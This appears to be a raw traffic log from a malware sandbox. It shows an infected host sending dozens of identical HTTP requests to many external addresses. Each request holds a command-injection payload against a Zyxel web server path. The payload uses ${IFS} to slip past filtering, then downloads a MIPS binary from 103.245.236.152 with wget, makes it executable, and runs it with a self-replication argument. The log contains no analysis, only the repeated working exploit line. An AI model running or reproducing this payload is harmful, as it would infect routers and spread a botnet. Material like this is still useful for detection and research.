                                      Jan 14, 2024 15:51:02.684173107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8533192.168.2.1434600173.223.39.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684215069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8534192.168.2.1441064202.147.230.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684262991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8535192.168.2.1451322204.179.15.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684283972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8536192.168.2.1452428157.135.95.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684325933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8537192.168.2.1443962204.7.182.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684381962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8538192.168.2.1440046211.143.216.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684428930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8539192.168.2.14450141.254.17.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684458017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8540192.168.2.144537645.179.183.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684515953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8541192.168.2.1433776136.200.171.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684556961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8542192.168.2.143815041.190.252.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684604883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8543192.168.2.144336835.190.252.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684643984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8544192.168.2.1447976154.159.21.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684676886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8545192.168.2.143736436.21.7.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684711933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8546192.168.2.1454128157.89.7.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684763908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8547192.168.2.144012476.224.179.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684799910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8548192.168.2.1440610150.74.164.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684858084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8549192.168.2.1436720205.49.93.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684892893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8550192.168.2.1453708138.124.238.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684937954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8551192.168.2.144357483.236.90.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684968948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8552192.168.2.145724487.31.47.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.684987068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8553192.168.2.1456596106.26.60.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685029984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8554192.168.2.1440116147.185.185.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685082912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8555192.168.2.1449176138.240.28.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685129881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8556192.168.2.144386859.208.81.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685183048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8557192.168.2.1459598139.105.243.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685214996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8558192.168.2.1438306112.62.38.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685254097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8559192.168.2.144877290.178.168.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685316086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8560192.168.2.1450848122.83.6.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685345888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8561192.168.2.1438240212.187.108.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685370922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8562192.168.2.1434656203.88.245.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685393095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8563192.168.2.145322813.217.89.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685426950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8564192.168.2.1454024168.106.188.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685462952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8565192.168.2.145514258.83.106.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685520887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8566192.168.2.145343658.192.172.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685547113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8567192.168.2.145812835.77.90.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685576916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8568192.168.2.145548645.5.166.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685647964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8569192.168.2.1453934161.172.27.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685667038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8570192.168.2.143754283.93.108.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685687065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8571192.168.2.1449952188.169.113.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685739994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8572192.168.2.145056839.2.80.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685796022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8573192.168.2.145262058.157.54.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685831070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8574192.168.2.144144634.96.242.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685906887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8575192.168.2.1446970203.71.147.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685923100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8576192.168.2.1445632206.175.229.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.685983896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8577192.168.2.1455512194.179.211.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686021090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8578192.168.2.1452834151.153.80.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686054945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8579192.168.2.145620085.196.28.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686106920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8580192.168.2.143800087.92.177.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686140060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8581192.168.2.144149693.204.145.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686165094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8582192.168.2.145136274.224.0.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686201096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8583192.168.2.1433004204.144.255.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686254978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8584192.168.2.1436772213.131.197.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686288118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8585192.168.2.1432822140.23.180.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686323881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8586192.168.2.1458812108.17.15.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686378002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8587192.168.2.1436078155.22.132.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686436892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8588192.168.2.1434666209.108.161.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686461926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8589192.168.2.1432900120.127.254.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686515093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8590192.168.2.1437732219.165.54.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686542988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8591192.168.2.145460894.243.127.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686569929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8592192.168.2.1434674189.57.206.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686625004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8593192.168.2.1442338220.150.184.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686678886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8594192.168.2.1454152185.253.219.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.686700106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8595192.168.2.1453780104.208.117.196443
                                      TimestampBytes transferredDirectionData
